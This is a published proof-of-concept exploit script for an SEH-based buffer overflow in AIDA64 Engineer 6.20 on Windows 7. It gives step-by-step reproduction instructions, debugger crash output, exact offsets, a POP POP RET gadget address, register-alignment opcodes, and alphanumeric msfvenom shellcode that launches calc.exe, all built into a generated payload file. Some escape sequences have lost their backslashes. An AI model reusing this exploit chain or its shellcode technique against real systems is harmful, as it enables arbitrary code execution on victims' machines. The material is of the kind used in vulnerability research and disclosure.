# Date: 2020-04-02
# Exploit Author: Hodorsec
# Version: v6.20.5300
# Date: 2020-04-02
# Exploit Author: Hodorsec
# Version: v6.20.5300
# Software Link: http://download.aida64.com/aida64engineer620.exe
# Vendor Homepage: https://www.aida64.com/products/aida64-engineer
# Tested on: Win7 x86 SP1 - Build 7601
# Description:
# - Exploits the "Report File" buffer when sending an e-mail report via the Report wizard. Entering an overly long string, results in a crash which overwrites SEH.
# Reproduction:
# - Use indicated OS or manipulate settings: your mileage may vary due to different offsets on other Windows versions / SP's.
# - Run the script, a TXT file will be generated
# - On the Windows machine, open the TXT file in Wordpad. Copy the contents to clipboard (ctrl+c)
# - Open AIDA64 Engineer
# - First, click on "File", "Preferences"
# - Click menu "Report", "Report File"
# - Enter a long string in the field "File name"
# - Set "File extension" to automatic, as by default
# - Click OK
# - Second, in the main menu, click "Report" which shows the "Report Wizard"
# - Next, "System Summary only", next, "Plain Text", Finish
# - Click the button "Send In E-mail"
# - Check results
# WinDBG initial crash output using only A's:
# (994.998): Access violation - code c0000005 (!!! second chance !!!)
# eax=03ac1048 ebx=03ac100c ecx=03ac109c edx=77f070f4 esi=03ac1140 edi=00000000
# eip=77f133a8 esp=03ac0fc8 ebp=03ac1000 iopl=0 nv up ei pl nz ac po nc
# cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
# ntdll!RtlAcquireSRWLockShared+0x1a:
# 77f133a8 8365f400 and dword ptr [ebp-0Ch],0 ss:0023:03ac0ff4=????????
#!/usr/bin/python
import sys,struct
filename = "aida64_engineer_poc.txt"
# Maximum length
maxlen = 5000
# Shellcode, using alphanum chars due to bytes considered to be bad above x7f
# msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b 'x00x0ax0d' bufferregister=eax
# Payload size: 440 bytes
shellcode = (
"x50x59x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b"
"x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58"
"x50x38x41x42x75x4ax49x4bx4cx49x78x6dx52x33x30"
"x45x50x45x50x53x50x6bx39x6dx35x36x51x49x50x43"
"x54x6ex6bx52x70x54x70x6cx4bx51x42x66x6cx4cx4b"
"x62x72x52x34x6ex6bx54x32x46x48x54x4fx6dx67x52"
"x6ax57x56x36x51x6bx4fx4ex4cx47x4cx31x71x71x6c"
"x53x32x36x4cx37x50x5ax61x6ax6fx54x4dx77x71x5a"
"x67x7ax42x38x72x70x52x46x37x4ex6bx53x62x52x30"
"x6cx4bx52x6ax47x4cx4cx4bx50x4cx67x61x51x68x78"
"x63x43x78x56x61x4ax71x53x61x6cx4bx33x69x55x70"
"x37x71x6ax73x4cx4bx43x79x72x38x49x73x46x5ax32"
"x69x4cx4bx44x74x6ex6bx67x71x58x56x54x71x6bx4f"
"x6ex4cx49x51x78x4fx44x4dx63x31x68x47x30x38x79"
"x70x30x75x68x76x43x33x51x6dx69x68x75x6bx61x6d"
"x74x64x44x35x78x64x52x78x6cx4bx73x68x74x64x57"
"x71x68x53x31x76x4cx4bx46x6cx32x6bx6ex6bx76x38"
"x47x6cx43x31x6bx63x6cx4bx33x34x6ex6bx46x61x38"
"x50x4cx49x77x34x31x34x61x34x43x6bx71x4bx53x51"
"x42x79x33x6ax62x71x6bx4fx4bx50x53x6fx61x4fx52"
"x7ax4cx4bx62x32x68x6bx6cx4dx33x6dx51x7ax37x71"
"x4ex6dx4dx55x38x32x75x50x77x70x63x30x50x50x55"
"x38x66x51x6ex6bx62x4fx6cx47x39x6fx59x45x4fx4b"
"x78x70x58x35x49x32x52x76x53x58x4cx66x6cx55x6d"
"x6dx4dx4dx79x6fx59x45x65x6cx46x66x51x6cx64x4a"
"x4fx70x39x6bx59x70x64x35x47x75x6dx6bx73x77x66"
"x73x42x52x42x4fx62x4ax75x50x31x43x59x6fx5ax75"
"x51x73x33x51x62x4cx55x33x46x4ex70x65x70x78x53"
"x55x65x50x41x41"
)
# Align the registers
# ESI = 04aaefc0, Buffer = 04abfb6c. Buffer - ESI = 0x010b8d
align_eax = (
"x56" # PUSH ESI
"x58" # POP EAX
"x66x05x3fx10" # ADD AX,0x103f # EAX = 0x04aaffff
"x40" # INC EAX # EAX = 0x04ab0000
"x66x05x01x7F" # ADD AX,0x7f01 # EAX = 0x04ab7f01
"x66x05x6bx7c" # ADD AX,0x7c6b # EAX = 0x04abfb6c
"x50" # PUSH EAX
)
# Offsets
crash_ebp = 307
crash_esi = 1583
crash_seh = 319
crash_nseh = crash_seh - 4
# Variables
ascii_nop = "x47" # Doesn't do anything particular for this program
nops = ascii_nop * 32 # ASCII NOP's amount
# Prefix
prefix = "A" * crash_nseh
nseh = "x71x06x70x04" # JNO SHORT # JO SHORT # Jump over NSEH/SEH
seh = struct.pack("<L", 0x0121076e) # POP POP RET # aida64.exe
suffix = align_eax # Align registers to execute shellcode
suffix += nops # Some ASCII friendly NOP's
suffix += shellcode # Magic!
suffix += "D" * (maxlen - len(prefix + nseh + seh + suffix)) # Filler
# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together
try:
file = open(filename,"wb")
file.write(payload)
file.close()
print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except:
print "[!] Error creating file!"
sys.exit(0)